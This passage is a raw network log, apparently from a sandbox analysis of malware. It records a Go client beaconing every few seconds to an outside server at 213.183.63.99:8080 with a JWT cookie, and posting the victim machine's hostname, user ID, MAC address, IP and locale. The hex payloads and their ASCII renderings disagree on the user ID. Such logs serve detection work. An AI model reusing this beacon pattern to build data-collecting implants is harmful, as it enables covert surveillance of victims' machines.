66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 35 31 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076351}
Nov 27, 2023 10:12:33.132160902 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:33 GMT Content-Length: 0
Nov 27, 2023 10:12:36.133266926 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:36.335901976 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:36 GMT Content-Length: 0
Nov 27, 2023 10:12:36.890369892 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 35 35 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076355}
Nov 27, 2023 10:12:37.100423098 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:36 GMT Content-Length: 0
Nov 27, 2023 10:12:40.101702929 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:40.304655075 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:40 GMT Content-Length: 0
Nov 27, 2023 10:12:40.856095076 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 35 39 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076359}
Nov 27, 2023 10:12:41.066114902 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:40 GMT Content-Length: 0
Nov 27, 2023 10:12:44.067797899 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:44.270402908 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:44 GMT Content-Length: 0
Nov 27, 2023 10:12:44.823168039 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 36 33 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076363}
Nov 27, 2023 10:12:45.029983997 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:44 GMT Content-Length: 0
Nov 27, 2023 10:12:49.371644020 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:49.574310064 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:49 GMT Content-Length: 0
Nov 27, 2023 10:12:50.133074045 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 36 38 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076368}
Nov 27, 2023 10:12:50.341698885 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:50 GMT Content-Length: 0
Nov 27, 2023 10:12:53.342760086 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:53.545542955 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:53 GMT Content-Length: 0
Nov 27, 2023 10:12:54.102040052 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 37 32 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076372}
Nov 27, 2023 10:12:54.309473991 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:54 GMT Content-Length: 0
Nov 27, 2023 10:12:57.316050053 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:57.519480944 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:57 GMT Content-Length: 0
Nov 27, 2023 10:12:58.087982893 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 37 36 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076376}
Nov 27, 2023 10:12:58.297277927 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:58 GMT Content-Length: 0
Nov 27, 2023 10:13:01.298338890 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:01.503215075 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:01 GMT Content-Length: 0
Nov 27, 2023 10:13:02.262689114 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 38 30 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076380}
Nov 27, 2023 10:13:02.473054886 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:02 GMT Content-Length: 0
Nov 27, 2023 10:13:05.474217892 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:05.676893950 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:05 GMT Content-Length: 0
Nov 27, 2023 10:13:06.226624012 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 38 34 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076384}
Nov 27, 2023 10:13:06.434288025 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:06 GMT Content-Length: 0
Nov 27, 2023 10:13:09.437474012 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:09.640115023 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:09 GMT Content-Length: 0
Nov 27, 2023 10:13:10.190026045 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 38 38 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076388}
Nov 27, 2023 10:13:10.403284073 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:10 GMT Content-Length: 0
Nov 27, 2023 10:13:13.404176950 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:13.606868029 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:13 GMT Content-Length: 0
Nov 27, 2023 10:13:14.169691086 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 39 32 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076392}
Nov 27, 2023 10:13:14.377789974 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:14 GMT Content-Length: 0
Nov 27, 2023 10:13:17.382409096 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:13:17.585338116 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:17 GMT Content-Length: 0
Nov 27, 2023 10:13:18.139144897 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 39 36 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076396}
Nov 27, 2023 10:13:18.348618984 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:13:18 GMT Content-Length: 0
